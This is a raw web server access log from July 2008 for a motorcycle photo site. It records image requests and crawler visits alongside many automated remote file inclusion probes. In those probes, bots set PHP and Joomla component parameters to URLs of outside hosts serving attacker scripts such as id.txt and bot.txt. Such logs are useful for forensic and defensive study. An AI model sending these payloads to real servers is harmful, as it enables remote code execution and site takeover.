216.246.78.141 - - [19/Jul/2008:10:34:57 -0700] "GET /logs/access_080129.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.78.141 - - [19/Jul/2008:10:34:58 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://classyclassified.com/images/save.jpg? HTTP/1.1" 200 18501 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.78.141 - - [19/Jul/2008:10:34:59 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
71.11.220.150 - - [19/Jul/2008:10:35:11 -0700] "GET /bikes/dteel/2008_01_26/IMG_4338M.JPG HTTP/1.1" 200 76584 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "www.dmulk.com"
71.11.220.150 - - [19/Jul/2008:10:35:11 -0700] "GET /bikes/dteel/2008_01_26/IMG_4346M.JPG HTTP/1.1" 200 75886 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "www.dmulk.com"
71.11.220.150 - - [19/Jul/2008:10:35:11 -0700] "GET /bikes/dteel/2008_01_26/IMG_4349M.JPG HTTP/1.1" 200 73896 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "www.dmulk.com"
71.11.220.150 - - [19/Jul/2008:10:35:11 -0700] "GET /bikes/dteel/2008_01_26/IMG_4347M.JPG HTTP/1.1" 200 93210 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "www.dmulk.com"
71.11.220.150 - - [19/Jul/2008:10:35:12 -0700] "GET /bikes/dteel/2008_01_26/IMG_4356M.JPG HTTP/1.1" 200 85422 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "www.dmulk.com"
71.11.220.150 - - [19/Jul/2008:10:35:12 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4359M.JPG HTTP/1.1" 200 106754 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "www.dmulk.com"
71.11.220.150 - - [19/Jul/2008:10:35:12 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4360M.JPG HTTP/1.1" 200 108624 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:10:35:12 -0700] "GET /bikes/CreSTOC07/CreSTOC2007090.jpg HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
71.11.220.150 - - [19/Jul/2008:10:35:12 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4362M.JPG HTTP/1.1" 200 102833 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "www.dmulk.com"
67.15.70.35 - - [19/Jul/2008:10:35:18 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://multimusiq.co.uk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.70.35 - - [19/Jul/2008:10:35:18 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://multimusiq.co.uk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.78.141 - - [19/Jul/2008:10:35:23 -0700] "GET /logs/access.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
194.85.80.86 - - [19/Jul/2008:10:35:54 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
194.85.80.86 - - [19/Jul/2008:10:35:55 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:10:36:09 -0700] "GET /bikes/CreSTOC07/CreSTOC2007091.jpg HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
200.157.209.164 - - [19/Jul/2008:10:36:30 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://multimusiq.co.uk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
200.157.209.164 - - [19/Jul/2008:10:36:30 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://multimusiq.co.uk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
87.244.11.20 - - [19/Jul/2008:10:36:32 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://members.lycos.co.uk/dudi42/wtf.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
87.244.11.20 - - [19/Jul/2008:10:36:34 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://members.lycos.co.uk/dudi42/wtf.txt??? HTTP/1.1" 200 18541 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
202.221.143.111 - - [19/Jul/2008:10:36:48 -0700] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [19/Jul/2008:10:36:48 -0700] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [19/Jul/2008:10:36:48 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [19/Jul/2008:10:36:48 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.246.78.141 - - [19/Jul/2008:10:36:51 -0700] "GET /logs/access_080313.log/?sourcedir=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.78.141 - - [19/Jul/2008:10:36:53 -0700] "GET /?sourcedir=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 200 18383 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.78.141 - - [19/Jul/2008:10:36:54 -0700] "GET /logs/?sourcedir=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 200 56851 "-" "libwww-perl/5.811" "www.dmulk.com"
218.38.54.160 - - [19/Jul/2008:10:37:00 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://naparstki.pl/mediagallery/maint/README? HTTP/1.1" 200 18525 "-" "libwww-perl/5.79" "www.dmulk.com"
217.110.54.240 - - [19/Jul/2008:10:37:00 -0700] "GET /logs/access_080329.log//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.jpcss.com/cgi/phpconv/Bookmarks/osi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.110.54.240 - - [19/Jul/2008:10:37:00 -0700] "GET /logs//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.jpcss.com/cgi/phpconv/Bookmarks/osi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.110.54.240 - - [19/Jul/2008:10:37:00 -0700] "GET //components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.jpcss.com/cgi/phpconv/Bookmarks/osi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:10:37:03 -0700] "GET /bikes/IMG_1192.jpg HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
217.110.54.240 - - [19/Jul/2008:10:37:11 -0700] "GET /logs/access_080329.log//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.jpcss.com/cgi/phpconv/Bookmarks/osi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.110.54.240 - - [19/Jul/2008:10:37:11 -0700] "GET /logs//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.jpcss.com/cgi/phpconv/Bookmarks/osi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.110.54.240 - - [19/Jul/2008:10:37:11 -0700] "GET //components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.jpcss.com/cgi/phpconv/Bookmarks/osi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.110.54.240 - - [19/Jul/2008:10:37:13 -0700] "GET /logs/access.log//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.jpcss.com/cgi/phpconv/Bookmarks/osi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.134.105.107 - - [19/Jul/2008:10:37:14 -0700] "GET /logs/access.log/?mosConfig_absolute_path=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.134.105.107 - - [19/Jul/2008:10:37:15 -0700] "GET /logs/?mosConfig_absolute_path=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 200 56851 "-" "libwww-perl/5.803" "www.dmulk.com"
218.38.54.160 - - [19/Jul/2008:10:37:15 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://naparstki.pl/mediagallery/maint/README? HTTP/1.1" 200 18525 "-" "libwww-perl/5.79" "www.dmulk.com"
217.110.54.240 - - [19/Jul/2008:10:37:26 -0700] "GET /logs/access.log//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.jpcss.com/cgi/phpconv/Bookmarks/osi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.38.54.160 - - [19/Jul/2008:10:37:59 -0700] "GET /logs/access_080329.log//admin/classes/TplLoad.php?full_path_to_public_program=http://naparstki.pl/mediagallery/maint/README? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.54.160 - - [19/Jul/2008:10:37:59 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://naparstki.pl/mediagallery/maint/README? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.54.160 - - [19/Jul/2008:10:37:59 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://naparstki.pl/mediagallery/maint/README? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:10:38:02 -0700] "GET /bikes/Picture051.avi HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
85.13.194.38 - - [19/Jul/2008:10:38:16 -0700] "GET /logs/access_080117.log/scanhttp://www.blackstock.ca/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.13.194.38 - - [19/Jul/2008:10:38:16 -0700] "GET /scanhttp://www.blackstock.ca/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.13.194.38 - - [19/Jul/2008:10:38:16 -0700] "GET /logs/scanhttp://www.blackstock.ca/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.181.105.117 - - [19/Jul/2008:10:38:24 -0700] "GET /logs//trans/trans.php?trans=&p=http://alternate-zone.com/themes/Sage/lightbox/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [19/Jul/2008:10:38:24 -0700] "GET /logs/access.log//trans/trans.php?trans=&p=http://alternate-zone.com/themes/Sage/lightbox/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [19/Jul/2008:10:38:25 -0700] "GET //trans/trans.php?trans=&p=http://alternate-zone.com/themes/Sage/lightbox/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.246.78.141 - - [19/Jul/2008:10:38:31 -0700] "GET /logs/?sourcedir=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 200 56851 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.78.141 - - [19/Jul/2008:10:38:32 -0700] "GET /?sourcedir=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 200 18383 "-" "libwww-perl/5.811" "www.dmulk.com"
209.126.254.80 - - [19/Jul/2008:10:39:01 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://203.71.212.3/www/modul/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:10:39:03 -0700] "GET /bikes/VFR750A.jpg HTTP/1.0" 200 212696 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
194.85.80.86 - - [19/Jul/2008:10:39:03 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
194.85.80.86 - - [19/Jul/2008:10:39:03 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
59.106.19.213 - - [19/Jul/2008:10:39:09 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.cepeduc.com/cepa/images/M.images/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [19/Jul/2008:10:39:10 -0700] "GET /logs/access_080313.log/?sourcedir=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [19/Jul/2008:10:39:13 -0700] "GET /?sourcedir=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 200 18383 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [19/Jul/2008:10:39:14 -0700] "GET /logs/?sourcedir=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 200 56851 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.24.242 - - [19/Jul/2008:10:39:23 -0700] "GET /logs/access_080228.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [19/Jul/2008:10:39:25 -0700] "GET /logs/access_080228.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.78.141 - - [19/Jul/2008:10:39:31 -0700] "GET /logs/access.log/?sourcedir=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.244.233.121 - - [19/Jul/2008:10:39:56 -0700] "GET /logs/access_080119.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.24.242 - - [19/Jul/2008:10:39:59 -0700] "GET /logs/access_080119.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:10:40:02 -0700] "GET /bikes/WeSTOC07/ HTTP/1.0" 200 955 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
218.38.54.160 - - [19/Jul/2008:10:40:19 -0700] "GET /logs/access_080315.log//admin/business_inc/saveserver.php?thisdir=http://naparstki.pl/mediagallery/maint/README? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.54.160 - - [19/Jul/2008:10:40:19 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://naparstki.pl/mediagallery/maint/README? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.54.160 - - [19/Jul/2008:10:40:19 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://naparstki.pl/mediagallery/maint/README? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.54.160 - - [19/Jul/2008:10:40:20 -0700] "GET /logs/access_080315.log//admin/business_inc/saveserver.php?thisdir=http://naparstki.pl/mediagallery/maint/README? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.54.160 - - [19/Jul/2008:10:40:20 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://naparstki.pl/mediagallery/maint/README? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.54.160 - - [19/Jul/2008:10:40:21 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://naparstki.pl/mediagallery/maint/README? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.221.143.111 - - [19/Jul/2008:10:40:29 -0700] "GET /logs/access_071225.log/errors.php?error=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [19/Jul/2008:10:40:29 -0700] "GET /logs/errors.php?error=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.111.176.106 - - [19/Jul/2008:10:40:33 -0700] "GET /logs/?sourcedir=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 200 56851 "-" "libwww-perl/5.805" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:10:40:34 -0700] "GET /logs/access_080129.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.176.106 - - [19/Jul/2008:10:40:36 -0700] "GET /?sourcedir=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 200 18383 "-" "libwww-perl/5.805" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:10:40:36 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 200 18487 "-" "libwww-perl/5.79" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:10:40:37 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.219.217.74 - - [19/Jul/2008:10:40:47 -0700] "GET /logs/access_080329.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.mojir.com/el/moodledata/site/read??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.219.217.74 - - [19/Jul/2008:10:40:50 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.mojir.com/el/moodledata/site/read??? HTTP/1.1" 200 18555 "-" "libwww-perl/5.79" "www.dmulk.com"
213.219.217.74 - - [19/Jul/2008:10:40:51 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.mojir.com/el/moodledata/site/read??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.181.105.117 - - [19/Jul/2008:10:40:53 -0700] "GET /logs/access_080528.log//trans/trans.php?trans=&p=http://alternate-zone.com/themes/Sage/lightbox/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:10:41:01 -0700] "GET /bikes/WeSTOC08/ HTTP/1.0" 200 832 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:10:41:15 -0700] "GET /logs/access.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.198.5.87 - - [19/Jul/2008:10:41:43 -0700] "GET /logs/access_080117.log/scanhttp://www.blackstock.ca/alb?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.5.87 - - [19/Jul/2008:10:41:43 -0700] "GET /scanhttp://www.blackstock.ca/alb?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.5.87 - - [19/Jul/2008:10:41:45 -0700] "GET /logs/scanhttp://www.blackstock.ca/alb?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:10:41:52 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:10:41:54 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 200 18475 "-" "libwww-perl/5.79" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:10:41:59 -0700] "GET /bikes/cb750K6/ HTTP/1.0" 200 1610 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
216.193.201.57 - - [19/Jul/2008:10:42:04 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/ojolah/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
216.193.201.57 - - [19/Jul/2008:10:42:16 -0700] "GET /logs/access_080313.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.geocities.com/ojolah/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
216.193.201.57 - - [19/Jul/2008:10:42:16 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.geocities.com/ojolah/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
207.213.245.215 - - [19/Jul/2008:10:42:23 -0700] "GET /logs/access_080313.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.215 - - [19/Jul/2008:10:42:32 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
151.67.109.62 - - [19/Jul/2008:10:42:34 -0700] "GET /?env[include_prefix]=http://www.elektroanlagen-sperling.de/i.txt?? HTTP/1.1" 200 18429 "-" "libwww-perl/5.808" "www.dmulk.com"
89.111.176.106 - - [19/Jul/2008:10:42:40 -0700] "GET /logs/access.log/?sourcedir=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.70.18 - - [19/Jul/2008:10:42:53 -0700] "GET /logs/access_080325.log/?mosConfig_absolute_path=http://www.hotelberberys.pl/includes/domit/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:10:42:59 -0700] "GET /bikes/dteel/2008_01_26/ HTTP/1.0" 200 6600 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
85.10.140.162 - - [19/Jul/2008:10:43:24 -0700] "GET //index.php?INCLUDE_FOLDER=http://www.elektroanlagen-sperling.de/i.txt?? HTTP/1.1" 200 18431 "-" "libwww-perl/5.805" "www.dmulk.com"
85.10.140.162 - - [19/Jul/2008:10:43:26 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.elektroanlagen-sperling.de/i.txt?? HTTP/1.1" 200 18429 "-" "libwww-perl/5.805" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:10:43:33 -0700] "GET /logs/access_080313.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:10:43:35 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 200 18503 "-" "libwww-perl/5.65" "www.dmulk.com"
218.38.54.160 - - [19/Jul/2008:10:43:37 -0700] "GET /logs/access_080313.log//admin/classes/TplLoad.php?full_path_to_public_program=http://naparstki.pl/mediagallery/maint/README? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.219.217.74 - - [19/Jul/2008:10:43:43 -0700] "GET /logs/access_080528.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.mojir.com/el/moodledata/site/read??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:10:43:49 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:10:44:00 -0700] "GET /bikes/dteel/2008_01_27/ HTTP/1.0" 200 5034 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:10:44:03 -0700] "GET /logs/access_080329.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.221.143.111 - - [19/Jul/2008:10:44:05 -0700] "GET /logs/access_080128.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:10:44:05 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 200 18477 "-" "libwww-perl/5.79" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:10:44:06 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.221.143.111 - - [19/Jul/2008:10:44:07 -0700] "GET /logs/access_080128.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:10:44:08 -0700] "GET /logs/access_080313.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:10:44:09 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 200 18503 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.18.246 - - [19/Jul/2008:10:44:13 -0700] "GET /bikes/dteel/2008_01_27/?S=A HTTP/1.0" 200 5034 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.193.201.57 - - [19/Jul/2008:10:44:25 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.geocities.com/ojolah/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
